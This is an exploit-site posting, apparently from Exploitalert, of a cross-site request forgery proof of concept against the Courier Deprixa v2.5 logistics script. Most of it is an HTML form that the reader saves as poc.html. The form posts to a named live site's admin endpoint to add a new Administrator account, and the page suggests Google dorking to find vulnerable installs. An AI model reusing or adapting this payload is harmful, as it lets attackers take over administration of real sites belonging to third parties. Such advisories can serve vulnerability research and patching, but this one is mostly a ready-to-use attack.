Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2021-33078 | CWE-352 | $500 | High |
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| John Doe | High | Remote | 2022-07-28 |
====================================================================================================================================
| # Title : COURIER DEPRIXA V2.5 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) |
| # Vendor : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/ |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking n Google Or Other Search Enggine.
[+] Use Payload : save as poc.html
[+] <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>
</div>
<div class="modal-body">
<!--Cuerpo del modal aqu el formulario-->
<form action="https://galaxyexpressuae.com/deprixa/settings/addusersadmin/agregar.php" class="form-horizontal" method="post">
<div class="form-group " id="gnombrepa">
<label for="off_name" class="col-sm-2 control-label">Name</label>
<div class="col-sm-10">
<input type="text" class="form-control off_name" name="name_parson" placeholder="Name Administrator ">
</div>
</div>
<div class="form-group" id="gapellido">
<label for="email" class="col-sm-2 control-label">Email </label>
<div class="col-sm-5">
<input type="text" class="form-control email" name="email" placeholder="Email ">
</div>
<div class="col-sm-5">
<input class="form-control phone" name="phone" placeholder="Phone">
</div>
</div>
<div class="form-group" id="gemail">
<label for="office" class="col-sm-2 control-label">Office</label>
<div class="col-sm-5">
<input type="text" class="form-control office" name="office" placeholder="Office ">
</div>
<div class="col-sm-5">
<select type="text" class="form-control role" name="role" >
<option value="Administrator">Administrator</option>
</select>
</div>
</div>
<div class="form-group " id="gnombre">
<label for="off_name" class="col-sm-2 control-label">User</label>
<div class="col-sm-10">
<input type="text" class="form-control off_name" name="name" placeholder="User">
</div>
</div>
<div class="form-group" id="gpassword">
<label for="pwd" class="col-sm-2 control-label">Password</label>
<div class="col-sm-10">
<input type="text" class="form-control pwd" name="pwd" placeholder="Password">
</div>
</div>
<div class="form-group">
<div class="col-sm-offset-2 col-sm-10">
<div class="checkbox checkbox-success">
<input id="checkbox3" type="checkbox" name="estado" value="1" checked>
<label for="checkbox3">
Status
</label>
</div>
<div class="checkbox checkbox-inline" >
<input type="checkbox" name="type" value="a" onclick="return false" checked>
<label for="inlineCheckbox3"> Type of user </label>
</div>
</div>
</div>
<!--Fin del cuerpo del modal-->
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>
Close</button>
<input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save">
</div>
</form>
</div>
</div>
</div>
<!--Fuck up
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
|
=======================================================================================================================================
Copyright ©2024 Exploitalert.